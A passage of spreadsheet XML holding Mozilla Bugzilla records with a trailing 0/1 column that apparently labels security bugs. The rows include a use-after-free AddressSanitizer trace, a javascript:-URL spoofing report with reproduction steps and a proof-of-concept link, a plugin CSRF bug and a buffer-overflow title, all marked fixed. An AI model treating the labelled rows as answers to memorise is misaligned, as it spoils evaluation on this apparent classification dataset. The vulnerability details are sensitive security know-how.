The 1821-line (of which only the last line seems interesting) testcase asserts js debug shell on TM tip without -j at Assertion failure: cx-&gt;throwing, at ../jsops.cpp:3581 and crashes js opt shell on TM tip without -j at js_Interpret
During the course of the reduction (many thanks go out to Jesse for his great help!), the asserts varied in message and so did the crash signature location.
I tested on Linux 64-bit, while Jesse was able to reproduce on Mac 32-bit.
s-s because crashing all over the place is scary. Assuming [sg:critical?] unless otherwise.
autoBisect coming up.</t>
        </is>
      </c>
      <c r="X5733" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5734">
      <c r="A5734" t="n">
        <v>1020034</v>
      </c>
      <c r="B5734" t="inlineStr">
        <is>
          <t>2014-06-03 18:16:01 -0700</t>
        </is>
      </c>
      <c r="C5734" t="inlineStr">
        <is>
          <t>TypedArray::WrapIntoNewCompartment is broken</t>
        </is>
      </c>
      <c r="D5734" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E5734" t="n">
        <v>1</v>
      </c>
      <c r="F5734" t="n">
        <v>1</v>
      </c>
      <c r="G5734" t="n">
        <v>3</v>
      </c>
      <c r="H5734" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5734" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5734" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5734" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5734" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5734" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5734" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5734" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5734" t="inlineStr">
        <is>
          <t>[adv-main33+]</t>
        </is>
      </c>
      <c r="Q5734" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5734" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5734" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T5734" t="n">
        <v>1</v>
      </c>
      <c r="U5734" t="n">
        <v>0</v>
      </c>
      <c r="V5734" t="n">
        <v>35</v>
      </c>
      <c r="W5734" t="inlineStr">
        <is>
          <t>It acts upon mObj, then it writes the new wrapped value into mObj.  But ComputeLengthAndData acts upon mObj, *after* that wrapping has happened, in the case of methods called via xrays.
Apparently we have no tests at all that exercise a WebIDL-implemented method, on an xray-wrapped object, that passes it a typed array or ArrayBuffer.  Joy.  Madness.  Inconceivable.</t>
        </is>
      </c>
      <c r="X5734" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5735">
      <c r="A5735" t="n">
        <v>1227538</v>
      </c>
      <c r="B5735" t="inlineStr">
        <is>
          <t>2015-11-24 06:45:16 -0800</t>
        </is>
      </c>
      <c r="C5735" t="inlineStr">
        <is>
          <t>"Javascript:" URL scheme can seem secure with a SSL indicator (leading to SSL Spoofing) and the wrong URL indicated can mislead the user about the real URL visited.</t>
        </is>
      </c>
      <c r="D5735" t="inlineStr">
        <is>
          <t>2024-05-30 09:07:23 -0700</t>
        </is>
      </c>
      <c r="E5735" t="n">
        <v>1</v>
      </c>
      <c r="F5735" t="n">
        <v>1</v>
      </c>
      <c r="G5735" t="n">
        <v>6</v>
      </c>
      <c r="H5735" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5735" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J5735" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5735" t="inlineStr">
        <is>
          <t>42 Branch</t>
        </is>
      </c>
      <c r="L5735" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5735" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5735" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5735" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5735" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main50+]</t>
        </is>
      </c>
      <c r="Q5735" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5735" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5735" t="inlineStr">
        <is>
          <t>Firefox 50</t>
        </is>
      </c>
      <c r="T5735" t="n">
        <v>1</v>
      </c>
      <c r="U5735" t="n">
        <v>0</v>
      </c>
      <c r="V5735" t="n">
        <v>21</v>
      </c>
      <c r="W5735" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0
Build ID: 20151029151421
Steps to reproduce:
1) Go to https://www.alternativ-testing.fr/Research/Mozilla/android/Zd7k-JavaScript-URL-Scheme-URL_and_SSL_Spoofing/poc.html
2)Copy the URL of the link into this specialy crafted webpage,
3)Paste this URL into the Location Bar ,
4)And after, Go to this URL.
( You can look the demonstration video that i will uploaded quickly in the attachments for view the exact steps needed and the real severity of this security bug )
Actual results:
The javascript URL has a SSL indicator and the wrong URL indicated can mislead the user about the real URL visited.
Expected results:
A javascript URL should never have a SSL indicator and when a javascript URL malformed is paste and a user try to go on this malformed javascript URL , the web page and the location bar shouldn't be affected by this interaction.</t>
        </is>
      </c>
      <c r="X5735" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5736">
      <c r="A5736" t="n">
        <v>1585656</v>
      </c>
      <c r="B5736" t="inlineStr">
        <is>
          <t>2019-10-02 06:38:28 -0700</t>
        </is>
      </c>
      <c r="C5736" t="inlineStr">
        <is>
          <t>[meta] Improve search capabilities of "Add Test Data" modal</t>
        </is>
      </c>
      <c r="D5736" t="inlineStr">
        <is>
          <t>2020-02-13 02:00:27 -0800</t>
        </is>
      </c>
      <c r="E5736" t="n">
        <v>1</v>
      </c>
      <c r="F5736" t="n">
        <v>1</v>
      </c>
      <c r="G5736" t="n">
        <v>7</v>
      </c>
      <c r="H5736" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5736" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5736" t="inlineStr">
        <is>
          <t>Perfherder</t>
        </is>
      </c>
      <c r="K5736" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5736" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5736" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5736" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5736" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5736" t="inlineStr"/>
      <c r="Q5736" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5736" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5736" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5736" t="n">
        <v>1</v>
      </c>
      <c r="U5736" t="n">
        <v>0</v>
      </c>
      <c r="V5736" t="n">
        <v>5</v>
      </c>
      <c r="W5736" t="inlineStr">
        <is>
          <t>We need to make it easier when searching for data to plot, or quickly plotting related data. For example, it should be quick to find page load results *(without necessarily knowing the terms raptor/browsertime and tp6)*. Once cold page load for a site is plotted, it would be great to have a quick way to add a comparison point, such as Firefox vs Chrome, etc.</t>
        </is>
      </c>
      <c r="X5736" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5737">
      <c r="A5737" t="n">
        <v>777578</v>
      </c>
      <c r="B5737" t="inlineStr">
        <is>
          <t>2012-07-25 17:04:07 -0700</t>
        </is>
      </c>
      <c r="C5737" t="inlineStr">
        <is>
          <t>Heap-use-after-free in PresShell::CompleteMove</t>
        </is>
      </c>
      <c r="D5737" t="inlineStr">
        <is>
          <t>2024-05-29 16:03:05 -0700</t>
        </is>
      </c>
      <c r="E5737" t="n">
        <v>1</v>
      </c>
      <c r="F5737" t="n">
        <v>1</v>
      </c>
      <c r="G5737" t="n">
        <v>3</v>
      </c>
      <c r="H5737" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5737" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5737" t="inlineStr">
        <is>
          <t>DOM: Selection</t>
        </is>
      </c>
      <c r="K5737" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5737" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5737" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5737" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5737" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5737" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+][qa?]</t>
        </is>
      </c>
      <c r="Q5737" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5737" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5737" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T5737" t="n">
        <v>1</v>
      </c>
      <c r="U5737" t="n">
        <v>0</v>
      </c>
      <c r="V5737" t="n">
        <v>20</v>
      </c>
      <c r="W5737" t="inlineStr">
        <is>
          <t>Created attachment 645954
Testcase
Reproduces on trunk
=================================================================
==11961== ERROR: AddressSanitizer heap-use-after-free on address 0x7f13daaa3bac at pc 0x7f14059ca41d bp 0x7fffba074190 sp 0x7fffba074188
READ of size 4 at 0x7f13daaa3bac thread T0
    #0 0x7f14059ca41d in nsINode::GetBoolFlag(nsINode::BooleanFlag) const src/../../dist/include/nsINode.h:1315
    #1 0x7f14059ca188 in nsINode::IsInDoc() const src/../../dist/include/nsINode.h:449
    #2 0x7f14059bc9fe in nsIContent::GetPrimaryFrame() const src/../../dist/include/nsIContent.h:821
    #3 0x7f14061b2266 in PresShell::CompleteMove(bool, bool) src/layout/base/nsPresShell.cpp:2203
    #4 0x7f14061b2e4d in non-virtual thunk to PresShell::CompleteMove(bool, bool) asn1cmn.c:0
    #5 0x7f14068c696d in mozilla::Selection::Modify(nsAString_internal const&amp;, nsAString_internal const&amp;, nsAString_internal const&amp;) src/layout/generic/nsSelection.cpp:5528
    #6 0x7f14113844ca in NS_InvokeByIndex_P src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:161
    #7 0x7f140c9906eb in CallMethodHelper::Call() src/js/xpconnect/src/XPCWrappedNative.cpp:2416
    #8 0x7f140c9f7a74 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1474
    #9 0x7f1417f21cc7 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:382
    #10 0x7f1417e959a1 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2424
    #11 0x7f1417e15ae5 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) src/js/src/jsinterp.cpp:302
    #12 0x7f1417f2eac6 in js::ExecuteKernel(JSContext*, JSScript*, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) src/js/src/jsinterp.cpp:488
    #13 0x7f1417f307c0 in js::Execute(JSContext*, JSScript*, JSObject&amp;, JS::Value*) src/js/src/jsinterp.cpp:525
    #14 0x7f14176e97ec in EvaluateUCScriptForPrincipalsCommon(JSContext*, JSObject*, JSPrincipals*, JSPrincipals*, unsigned short const*, unsigned int, char const*, unsigned int, JS::Value*, JSVersion) src/js/src/jsapi.cpp:5439
    #15 0x7f14176eb6ac in JS_EvaluateUCScriptForPrincipalsVersionOrigin src/js/src/jsapi.cpp:5476
    #16 0x7f1409b568ff in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) src/dom/base/nsJSEnvironment.cpp:1487
    #17 0x7f1409d0a81e in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) src/dom/base/nsGlobalWindow.cpp:9542
    #18 0x7f1409cc0e52 in nsGlobalWindow::RunTimeout(nsTimeout*) src/dom/base/nsGlobalWindow.cpp:9803
    #19 0x7f1409d08a2b in nsGlobalWindow::TimerCallback(nsITimer*, void*) src/dom/base/nsGlobalWindow.cpp:10071
    #20 0x7f14112c0f92 in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:474
    #21 0x7f14112c2bcc in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:558
    #22 0x7f14112851fd in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:625
    #23 0x7f1410f13fad in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:217
    #24 0x7f140feae88b in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:117
    #25 0x7f141153749a in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:209
    #26 0x7f14115372e3 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:202
    #27 0x7f14115371c8 in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:176
    #28 0x7f140f3b407e in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:165
    #29 0x7f140e003158 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:271
    #30 0x7f140474fae0 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3798
    #31 0x7f1404756482 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3875
    #32 0x7f1404759952 in XRE_main src/toolkit/xre/nsAppRunner.cpp:3951
    #33 0x40c28f in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
    #34 0x409cbd in main src/browser/app/nsBrowserApp.cpp:312
    #35 0x7f1421421c4d in ?? ??:0
0x7f13daaa3bac is located 44 bytes inside of 128-byte region [0x7f13daaa3b80,0x7f13daaa3c00)
freed by thread T0 here:
    #0 0x4a4392 in free ??:0
    #1 0x7f141e2ad5c3 in moz_free src/memory/mozalloc/mozalloc.cpp:49
    #2 0x7f1408b98586 in ~nsHTMLBodyElement src/content/html/content/src/nsHTMLBodyElement.cpp:279
    #3 0x7f1407d79ffd in nsNodeUtils::LastRelease(nsINode*) src/content/base/src/nsNodeUtils.cpp:252
    #4 0x7f1407c50acf in nsGenericElement::Release() src/content/base/src/nsGenericElement.cpp:3509
    #5 0x7f1408b98c94 in nsHTMLBodyElement::Release() src/content/html/content/src/nsHTMLBodyElement.cpp:283
    #6 0x7f140c8482a9 in _ZL17DoDeferredReleaseIP11nsISupportsEvR8nsTArrayIT_24nsTArrayDefaultAllocatorE src/js/xpconnect/src/XPCJSRuntime.cpp:563
    #7 0x7f140c847ac9 in XPCJSRuntime::GCCallback(JSRuntime*, JSGCStatus) src/js/xpconnect/src/XPCJSRuntime.cpp:598
    #8 0x7f1417c42e07 in Collect(JSRuntime*, bool, long, js::JSGCInvocationKind, js::gcreason::Reason) src/js/src/jsgc.cpp:4016
    #9 0x7f1417c38e35 in js::GCSlice(JSRuntime*, js::JSGCInvocationKind, js::gcreason::Reason) src/js/src/jsgc.cpp:4044
    #10 0x7f1417b940db in js::IncrementalGC(JSRuntime*, js::gcreason::Reason) src/js/src/jsfriendapi.cpp:168
    #11 0x7f1409b3dca3 in nsJSContext::GarbageCollectNow(js::gcreason::Reason, nsJSContext::IsIncremental, nsJSContext::IsCompartment, nsJSContext::IsShrinking) src/dom/base/nsJSEnvironment.cpp:2918
    #12 0x7f1409b8305e in GCTimerFired(nsITimer*, void*) src/dom/base/nsJSEnvironment.cpp:3214
    #13 0x7f14112c0f92 in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:474
    #14 0x7f14112c2bcc in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:558
    #15 0x7f14112851fd in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:625
    #16 0x7f1410f13fad in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:217
    #17 0x7f140feae88b in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:117
    #18 0x7f141153749a in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:209
    #19 0x7f14115372e3 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:202
    #20 0x7f14115371c8 in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:176
    #21 0x7f140f3b407e in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:165
    #22 0x7f140e003158 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:271
    #23 0x7f140474fae0 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3798
    #24 0x7f1404756482 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3875
    #25 0x7f1404759952 in XRE_main src/toolkit/xre/nsAppRunner.cpp:3951
    #26 0x40c28f in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
    #27 0x409cbd in main src/browser/app/nsBrowserApp.cpp:312
    #28 0x7f1421421c4d in ?? ??:0
previously allocated by thread T0 here:
    #0 0x4a4452 in __interceptor_malloc ??:0
    #1 0x7f141e2ad717 in moz_xmalloc src/memory/mozalloc/mozalloc.cpp:54
    #2 0x7f1408b97b79 in NS_NewHTMLBodyElement(already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) src/content/html/content/src/nsHTMLBodyElement.cpp:264
    #3 0x7f140932b2ee in CreateHTMLElement(unsigned int, already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) src/content/html/document/src/nsHTMLContentSink.cpp:497
    #4 0x7f140932bbb0 in NS_NewHTMLElement(nsIContent**, already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) src/content/html/document/src/nsHTMLContentSink.cpp:480
    #5 0x7f1407d4b5f8 in NS_NewElement(nsIContent**, already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) src/content/base/src/nsNameSpaceManager.cpp:201
    #6 0x7f1407a2b8bd in nsDocument::CreateElementNS(nsAString_internal const&amp;, nsAString_internal const&amp;, nsIContent**) src/content/base/src/nsDocument.cpp:4410
    #7 0x7f140caf1c8c in nsIDOMDocument_CreateElementNS(JSContext*, unsigned int, JS::Value*) src/objdir-ff-asan-sym/js/xpconnect/src/dom_quickstubs.cpp:3242
    #8 0x7f1417f21cc7 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:382
    #9 0x7f1417e959a1 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2424
    #10 0x7f1417e15ae5 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) src/js/src/jsinterp.cpp:302
    #11 0x7f1417f220e9 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) src/js/src/jsinterp.cpp:356
    #12 0x7f141784a890 in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) src/js/src/jsinterp.h:119
    #13 0x7f1417f2724d in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) src/js/src/jsinterp.cpp:388
    #14 0x7f14176f2a49 in JS_CallFunctionValue src/js/src/jsapi.cpp:5569
    #15 0x7f1409b63b15 in nsJSContext::CallEventHandler(nsISupports*, JSObject*, JSObject*, nsIArray*, nsIVariant**) src/dom/base/nsJSEnvironment.cpp:1907
    #16 0x7f140a309606 in nsJSEventListener::HandleEvent(nsIDOMEvent*) src/dom/src/events/nsJSEventListener.cpp:188
    #17 0x7f140878b7b3 in nsEventListenerManager::HandleEventSubType(nsListenerStruct*, nsIDOMEventListener*, nsIDOMEvent*, nsIDOMEventTarget*, unsigned int, nsCxPusher*) src/content/events/src/nsEventListenerManager.cpp:794
    #18 0x7f140878cc7a in nsEventListenerManager::HandleEventInternal(nsPresContext*, nsEvent*, nsIDOMEvent**, nsIDOMEventTarget*, unsigned int, nsEventStatus*, nsCxPusher*) src/content/events/src/nsEventListenerManager.cpp:867
    #19 0x7f1408928b67 in nsEventListenerManager::HandleEvent(nsPresContext*, nsEvent*, nsIDOMEvent**, nsIDOMEventTarget*, unsigned int, nsEventStatus*, nsCxPusher*) src/content/events/src/nsEventListenerManager.h:144
    #20 0x7f1408917806 in nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&amp;, unsigned int, bool, nsCxPusher*) src/content/events/src/nsEventDispatcher.cpp:184
    #21 0x7f140891536c in nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&amp;, unsigned int, nsDispatchingCallback*, bool, nsCxPusher*) src/content/events/src/nsEventDispatcher.cpp:312
    #22 0x7f140891ae80 in nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*, nsCOMArray&lt;nsIDOMEventTarget&gt;*) src/content/events/src/nsEventDispatcher.cpp:633
    #23 0x7f1405fd5dbf in DocumentViewerImpl::LoadComplete(unsigned int) src/layout/base/nsDocumentViewer.cpp:1017
    #24 0x7f140da6f3a8 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, unsigned int) src/docshell/base/nsDocShell.cpp:6300
==11961== ABORTING
Stats: 261M malloced (268M for red zones) by 547279 calls
Stats: 87M realloced by 38827 calls
Stats: 230M freed by 421350 calls
Stats: 99M really freed by 214956 calls
Stats: 444M (113737 full pages) mmaped in 111 calls
  mmaps   by size class: 8:294894; 9:57337; 10:20475; 11:16376; 12:4096; 13:3584; 14:1536; 15:384; 16:512; 17:128; 18:272; 19:112; 20:40;
  mallocs by size class: 8:425683; 9:65265; 10:24573; 11:20475; 12:3931; 13:3838; 14:1797; 15:448; 16:637; 17:146; 18:323; 19:118; 20:45;
  frees   by size class: 8:315274; 9:56823; 10:21534; 11:17730; 12:3193; 13:3642; 14:1616; 15:395; 16:575; 17:120; 18:298; 19:109; 20:41;
  rfrees  by size class: 8:164321; 9:27420; 10:9917; 11:10072; 12:968; 13:626; 14:933; 15:164; 16:340; 17:69; 18:56; 19:47; 20:23;
Stats: malloc large: 632 small slow: 2649
Shadow byte and word:
  0x1fe27b554775: fd
  0x1fe27b554770: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1fe27b554750: fd fd fd fd fd fd fd fd
  0x1fe27b554758: fd fd fd fd fd fd fd fd
  0x1fe27b554760: fa fa fa fa fa fa fa fa
  0x1fe27b554768: fa fa fa fa fa fa fa fa
=&gt;0x1fe27b554770: fd fd fd fd fd fd fd fd
  0x1fe27b554778: fd fd fd fd fd fd fd fd
  0x1fe27b554780: fa fa fa fa fa fa fa fa
  0x1fe27b554788: fa fa fa fa fa fa fa fa
  0x1fe27b554790: fd fd fd fd fd fd fd fd</t>
        </is>
      </c>
      <c r="X5737" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5738">
      <c r="A5738" t="n">
        <v>1887343</v>
      </c>
      <c r="B5738" t="inlineStr">
        <is>
          <t>2024-03-23 10:28:56 -0700</t>
        </is>
      </c>
      <c r="C5738" t="inlineStr">
        <is>
          <t>Window may remain disabled after file dialog is shown in full-screen</t>
        </is>
      </c>
      <c r="D5738" t="inlineStr">
        <is>
          <t>2024-06-02 11:56:28 -0700</t>
        </is>
      </c>
      <c r="E5738" t="n">
        <v>1</v>
      </c>
      <c r="F5738" t="n">
        <v>1</v>
      </c>
      <c r="G5738" t="n">
        <v>3</v>
      </c>
      <c r="H5738" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5738" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5738" t="inlineStr">
        <is>
          <t>Widget: Win32</t>
        </is>
      </c>
      <c r="K5738" t="inlineStr">
        <is>
          <t>Firefox 125</t>
        </is>
      </c>
      <c r="L5738" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5738" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5738" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5738" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5738" t="inlineStr">
        <is>
          <t>[adv-main126+]</t>
        </is>
      </c>
      <c r="Q5738" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5738" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5738" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T5738" t="n">
        <v>1</v>
      </c>
      <c r="U5738" t="n">
        <v>0</v>
      </c>
      <c r="V5738" t="n">
        <v>17</v>
      </c>
      <c r="W5738" t="inlineStr">
        <is>
          <t>Created attachment 9392912
crash.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Steps to reproduce:
Open the attachment
Double-click the area
Select the image
Press ESC
The Firefox browser version 126.0a1 completely freezes and does not respond to commands.
Report: https://crash-stats.mozilla.org/report/index/4a5ad2e3-a855-42de-8227-fb7370240323#tab-details</t>
        </is>
      </c>
      <c r="X5738" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5739">
      <c r="A5739" t="n">
        <v>573873</v>
      </c>
      <c r="B5739" t="inlineStr">
        <is>
          <t>2010-06-22 17:06:02 -0700</t>
        </is>
      </c>
      <c r="C5739" t="inlineStr">
        <is>
          <t>CSRF from 307 redirects</t>
        </is>
      </c>
      <c r="D5739" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E5739" t="n">
        <v>1</v>
      </c>
      <c r="F5739" t="n">
        <v>1</v>
      </c>
      <c r="G5739" t="n">
        <v>6</v>
      </c>
      <c r="H5739" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5739" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5739" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K5739" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5739" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5739" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5739" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5739" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5739" t="inlineStr">
        <is>
          <t>[sg:high] Okay to publish? embargo?</t>
        </is>
      </c>
      <c r="Q5739" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5739" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5739" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5739" t="n">
        <v>1</v>
      </c>
      <c r="U5739" t="n">
        <v>0</v>
      </c>
      <c r="V5739" t="n">
        <v>67</v>
      </c>
      <c r="W5739" t="inlineStr">
        <is>
          <t>Since plugins are not made aware of redirects they are vulnerable to CSRF via307 redirects.  Further details to be filled up by more knowledgeable folks.</t>
        </is>
      </c>
      <c r="X5739" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5740">
      <c r="A5740" t="n">
        <v>848417</v>
      </c>
      <c r="B5740" t="inlineStr">
        <is>
          <t>2013-03-06 09:17:53 -0800</t>
        </is>
      </c>
      <c r="C5740" t="inlineStr">
        <is>
          <t>Mozilla Maintenance Service buffer overflow allowing privilege escalation</t>
        </is>
      </c>
      <c r="D5740" t="inlineStr">
        <is>
          <t>2024-05-30 08:01:02 -0700</t>
        </is>
      </c>
      <c r="E5740" t="n">
        <v>1</v>
      </c>
      <c r="F5740" t="n">
        <v>1</v>
      </c>
      <c r="G5740" t="n">
        <v>3</v>
      </c>
      <c r="H5740" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5740" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J5740" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K5740" t="inlineStr">
        <is>
          <t>19 Branch</t>
        </is>
      </c>
      <c r="L5740" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5740" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5740" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5740" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5740" t="inlineStr">
        <is>
          <t>[adv-main20+][adv-esr1705+]</t>
        </is>
      </c>
